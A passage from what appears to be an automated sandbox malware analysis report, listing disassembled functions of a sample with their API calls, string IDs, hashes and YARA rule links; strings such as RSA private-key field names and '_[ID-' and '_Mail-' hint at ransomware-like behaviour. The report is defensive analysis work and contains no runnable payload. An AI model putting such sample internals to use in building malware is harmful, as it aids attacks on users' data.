                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Decorator::get$Type$Data$BasicNameName::operator+=Name::operator=operator+$IndirectName::Scoped
                                      • String ID: std::nullptr_t$std::nullptr_t $volatile
                                      • API String ID: 2673590388-294867888
                                      • Opcode ID: bb35316c46956e2c0dbced9d9ba0e0f954f2483ff131f009418d16213a06a8fb
                                      • Instruction ID: 876a400b90c5f648ac187908ef9b9ec7044e02f1dcbb9158f4d08e954ba4033c
                                      • Opcode Fuzzy Hash: bb35316c46956e2c0dbced9d9ba0e0f954f2483ff131f009418d16213a06a8fb
                                      • Instruction Fuzzy Hash: BF510671809604EBCB10DF2ECC559AA7FB9FF84362F144576EC4487166DB328A89CB50
                                      Function 0096D439 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$Info
                                      • String ID:
                                      • API String ID: 2509303402-0
                                      • Opcode ID: 3b329866dc076c3a5f06fbe00ec8a6bf3451174e28b036d5e131202eabe08542
                                      • Instruction ID: c358b6a500a67a1a68b34d1694f0ccb07dc47b55f2eef8f3fb8112617a0a347a
                                      • Opcode Fuzzy Hash: 3b329866dc076c3a5f06fbe00ec8a6bf3451174e28b036d5e131202eabe08542
                                      • Instruction Fuzzy Hash: B8B1AEB1E012459FDB10DF68C881BEEBBF9FF48300F148469F4A9A7242DB75A945CB21
                                      Function 0097E2F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 0097E33C
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D6A8
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D6BA
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D6CC
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D6DE
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D6F0
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D702
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D714
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D726
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D738
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D74A
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D75C
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D76E
                                        • Part of subcall function 0097D68B: _free.LIBCMT ref: 0097D780
                                      • _free.LIBCMT ref: 0097E331
                                        • Part of subcall function 00975565: HeapFree.KERNEL32(00000000,00000000,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?), ref: 0097557B
                                        • Part of subcall function 00975565: GetLastError.KERNEL32(?,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?,?), ref: 0097558D
                                      • _free.LIBCMT ref: 0097E353
                                      • _free.LIBCMT ref: 0097E368
                                      • _free.LIBCMT ref: 0097E373
                                      • _free.LIBCMT ref: 0097E395
                                      • _free.LIBCMT ref: 0097E3A8
                                      • _free.LIBCMT ref: 0097E3B6
                                      • _free.LIBCMT ref: 0097E3C1
                                      • _free.LIBCMT ref: 0097E3F9
                                      • _free.LIBCMT ref: 0097E400
                                      • _free.LIBCMT ref: 0097E41D
                                      • _free.LIBCMT ref: 0097E435
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 13b9759fb2b5df1dbeba96c278c2b09315560ef4120b7f07a1a38e9d5d1a5369
                                      • Instruction ID: 05dedcd49cfbe690778bf94ed667b442da1cd5458f43ea2444c9f5ad915a8611
                                      • Opcode Fuzzy Hash: 13b9759fb2b5df1dbeba96c278c2b09315560ef4120b7f07a1a38e9d5d1a5369
                                      • Instruction Fuzzy Hash: 66314A33600B01DFEB20AA78D849B6A77E9EF84750F55C4AAF45CD71A1EB70ED418B20
                                      Function 0097D789 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 8d42e99861c1e6e40c937ac7e006cb075269a46d4540999de460ba3881580d32
                                      • Instruction ID: 02bbdecdcf2ce4171790035d8d1eedefd6da9070b0f4f753071e963be91e5578
                                      • Opcode Fuzzy Hash: 8d42e99861c1e6e40c937ac7e006cb075269a46d4540999de460ba3881580d32
                                      • Instruction Fuzzy Hash: 61C12373D40204ABDB64DBA8CC42FEEB7F8AF49710F558165FA09FB282D6709E418764
                                      Function 0093215C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Maklocchr$GetcvtMaklocstr$GetvalsH_prolog3_
                                      • String ID: false$true
                                      • API String ID: 2593140031-2658103896
                                      • Opcode ID: 99719d17b978a050528052e9b5bee77c47cbe8f7b5787d378739ef0b60385fe5
                                      • Instruction ID: 3943d8ef333c8dd102a2dff35d1a15ddc6dd443b7db4b6c257533a83628ab18c
                                      • Opcode Fuzzy Hash: 99719d17b978a050528052e9b5bee77c47cbe8f7b5787d378739ef0b60385fe5
                                      • Instruction Fuzzy Hash: 072162B1D00318AADF15EFE4E846BDF7BB8AF45710F018416F9199F286DB709544CBA1
                                      Function 0095ADE6 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 0095AEE1
                                      • ___TypeMatch.LIBVCRUNTIME ref: 0095B013
                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 0095B0DD
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0095B13B
                                      • _UnwindNestedFrames.LIBCMT ref: 0095B15F
                                      • CallUnexpected.LIBVCRUNTIME ref: 0095B17A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ExceptionSpec$CallException@8FramesMatchNestedThrowTypeUnexpectedUnwind
                                      • String ID: csm$csm$csm
                                      • API String ID: 2291861386-393685449
                                      • Opcode ID: cf7180b12294ef52059d6621404cf4c6baa596a81e8bdb992a7b536004236889
                                      • Instruction ID: 745a06f296bd9dffcda40991105d56c6f1c0cc5aa31ada5d6d59e25bbe24cb4e
                                      • Opcode Fuzzy Hash: cf7180b12294ef52059d6621404cf4c6baa596a81e8bdb992a7b536004236889
                                      • Instruction Fuzzy Hash: 7FB1AC71800609DFCF25DFA6D881AAEBBB9FF54312F10421AEC146B245C330DA5ACF96
                                      Function 00912F40 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 179COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 009112F0: ___std_type_info_name.LIBVCRUNTIME ref: 009113AE
                                        • Part of subcall function 009112F0: ___std_type_info_name.LIBVCRUNTIME ref: 00911419
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 00912FD4
                                        • Part of subcall function 009583D9: ___unDName.LIBVCRUNTIME ref: 00958405
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 0091303E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ___std_type_info_name$Name___un
                                      • String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent$ThisObject:
                                      • API String ID: 3683324773-4091968653
                                      • Opcode ID: 326e5daa51ac81fd2c7feb3788f3300054cbcb822dd3a8c28eb50f15f597af69
                                      • Instruction ID: dbcc98be4dde9897fb45290de8300eaceb0f5970087b31b76526f8e0048360e0
                                      • Opcode Fuzzy Hash: 326e5daa51ac81fd2c7feb3788f3300054cbcb822dd3a8c28eb50f15f597af69
                                      • Instruction Fuzzy Hash: EF61E630604745AFC711EF78C845B9BBBF5AFC6304F008B19F0955B291EBB2A958CB92
                                      Function 0094A81F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 0094A86B
                                      • SwitchToThread.KERNEL32(?), ref: 0094A88E
                                      • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 0094A8AD
                                      • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0094A8C9
                                      • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 0094A8D4
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0094A8FB
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094A909
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextException@8InternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadThrowstd::invalid_argument::invalid_argument
                                      • String ID: count$ppVirtualProcessorRoots
                                      • API String ID: 3409498682-3650809737
                                      • Opcode ID: 11ddd3f780f120c9ce6f19924a76174860a9a208753f8b3c902f2037d8ef4f69
                                      • Instruction ID: 40e4e780342eda56f086fb7a50a45ea7b3e72524bc1ab68d45ea833e8d72895d
                                      • Opcode Fuzzy Hash: 11ddd3f780f120c9ce6f19924a76174860a9a208753f8b3c902f2037d8ef4f69
                                      • Instruction Fuzzy Hash: 88215174A40309AFCB14EFA9C595EAD77B8FF89354F4040A9E901AB351DB30AE45CF51
                                      Function 00932235 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 73COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: GetcvtMaklocchrMaklocstr$H_prolog3_
                                      • String ID: false$true
                                      • API String ID: 2216850052-2658103896
                                      • Opcode ID: fa3bc49533e357028b7aae8af40fc956923ea5d9563054dd95fa610eb319dbec
                                      • Instruction ID: 24203e937b7624fe3eac3e3fb72a701c054269a79604e23418abfc769450371a
                                      • Opcode Fuzzy Hash: fa3bc49533e357028b7aae8af40fc956923ea5d9563054dd95fa610eb319dbec
                                      • Instruction Fuzzy Hash: AC215CB5C00348AADF14EFA5D885AAFB7F8EF94700F00845AF8199F256EB70D944CB61
                                      Function 0094A2D7 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 0094A2F1
                                      • GetCurrentProcess.KERNEL32 ref: 0094A2F9
                                      • DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 0094A30E
                                      • SafeRWList.LIBCONCRT ref: 0094A32E
                                        • Part of subcall function 0094832E: __EH_prolog3.LIBCMT ref: 00948335
                                        • Part of subcall function 0094832E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0094833F
                                        • Part of subcall function 0094832E: List.LIBCMT ref: 00948349
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0094A340
                                      • GetLastError.KERNEL32 ref: 0094A34F
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0094A365
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094A373
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8H_prolog3HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                      • String ID: eventObject
                                      • API String ID: 3870774015-1680012138
                                      • Opcode ID: e4fea81e3986cddc4d90850df98227f91e4cfd050c9c23d1be7dfc8bbd691fb5
                                      • Instruction ID: 0887967f01585393a9e1e83be450c00ab3ba032b8b901af66f140568a0ce232e
                                      • Opcode Fuzzy Hash: e4fea81e3986cddc4d90850df98227f91e4cfd050c9c23d1be7dfc8bbd691fb5
                                      • Instruction Fuzzy Hash: CF11E571544205EBCB24EFA8DC4AFEE776CAF04711F208119F505A60E1EB749E04C761
                                      Function 009552B6 Relevance: 15.1, APIs: 10, Instructions: 69threadCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 009552CC
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,0094917E,?,?,?,?,00000000,?,00000000), ref: 009552DE
                                      • GetCurrentThread.KERNEL32 ref: 009552E6
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,0094917E,?,?,?,?,00000000,?,00000000), ref: 009552EE
                                      • DuplicateHandle.KERNEL32(00000000,00000000,00000000,00949222,00000000,00000000,00000002,?,?,?,?,?,0094917E,?,?,?), ref: 00955307
                                      • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00955328
                                        • Part of subcall function 009435B4: ___crtCreateThreadpoolTimer.LIBCPMT ref: 009435C0
                                        • Part of subcall function 009435B4: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 009435CE
                                        • Part of subcall function 009435B4: ___crtSetThreadpoolWait.LIBCPMT ref: 009435E0
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,0094917E,?,?,?,?,00000000,?,00000000), ref: 0095533A
                                      • GetLastError.KERNEL32(?,?,?,?,0094917E,?,?,?,?,00000000,?,00000000), ref: 00955365
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0095537B
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00955389
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThreadThreadpoolWait___crt$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateDuplicateException@8HandleReferenceRegisterThrowTimer
                                      • String ID:
                                      • API String ID: 1073306966-0
                                      • Opcode ID: 31fb9a1a18525174e61fc178e648db1ebb4fa3af0218e48de2c7b7f49bbedaad
                                      • Instruction ID: 4d0434d7984553a457caa4e0f71d3fe82b49f64848746df91c691d51dd5f4b7a
                                      • Opcode Fuzzy Hash: 31fb9a1a18525174e61fc178e648db1ebb4fa3af0218e48de2c7b7f49bbedaad
                                      • Instruction Fuzzy Hash: 3D11D5B1A08300EBC710EF799C5AF9A3B6CAF45381F054076FE49D6162EA70CA089B71
                                      Function 00974A85 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00974A99
                                        • Part of subcall function 00975565: HeapFree.KERNEL32(00000000,00000000,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?), ref: 0097557B
                                        • Part of subcall function 00975565: GetLastError.KERNEL32(?,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?,?), ref: 0097558D
                                      • _free.LIBCMT ref: 00974AA5
                                      • _free.LIBCMT ref: 00974AB0
                                      • _free.LIBCMT ref: 00974ABB
                                      • _free.LIBCMT ref: 00974AC6
                                      • _free.LIBCMT ref: 00974AD1
                                      • _free.LIBCMT ref: 00974ADC
                                      • _free.LIBCMT ref: 00974AE7
                                      • _free.LIBCMT ref: 00974AF2
                                      • _free.LIBCMT ref: 00974B00
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 5b6716085d02569bc62a412d2189c5a37f0862d843bb4e1a0ffdcb4d6c0411f5
                                      • Instruction ID: 0a5c8122970f48805b6f65b0ee91ee5c1053d3d51f62206c5a17c4e13dd146be
                                      • Opcode Fuzzy Hash: 5b6716085d02569bc62a412d2189c5a37f0862d843bb4e1a0ffdcb4d6c0411f5
                                      • Instruction Fuzzy Hash: 7B118676540548FFCB41EF95C842ED93BA6EF44B50F9680A5BA0C8F222DA71DE509B80
                                      Function 008C829C Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 477COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008C895A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Ios_base_dtorstd::ios_base::_
                                      • String ID: %$&4r*3d$($.1UI$77H75$_Mail-$_[ID-
                                      • API String ID: 323602529-187489793
                                      • Opcode ID: f0ad2644dad474c59f8c94062db39c4fbb15ffd448d5c5792af61c0f10e7732a
                                      • Instruction ID: 400d435f72618590ca98dc97720ba260e8b00f148f86392fdbd883feb0784c91
                                      • Opcode Fuzzy Hash: f0ad2644dad474c59f8c94062db39c4fbb15ffd448d5c5792af61c0f10e7732a
                                      • Instruction Fuzzy Hash: 22129C30A14258CBDB25CF28CD58BEDBBB1FB85308F50829DD449AB292DB75DA84CF51
                                      Function 0093B08E Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0093B095
                                        • Part of subcall function 008E95D0: std::_Lockit::_Lockit.LIBCPMT ref: 008E9619
                                        • Part of subcall function 008E95D0: std::_Lockit::_Lockit.LIBCPMT ref: 008E963B
                                        • Part of subcall function 008E95D0: std::_Lockit::~_Lockit.LIBCPMT ref: 008E965B
                                        • Part of subcall function 008E95D0: std::_Lockit::~_Lockit.LIBCPMT ref: 008E9728
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
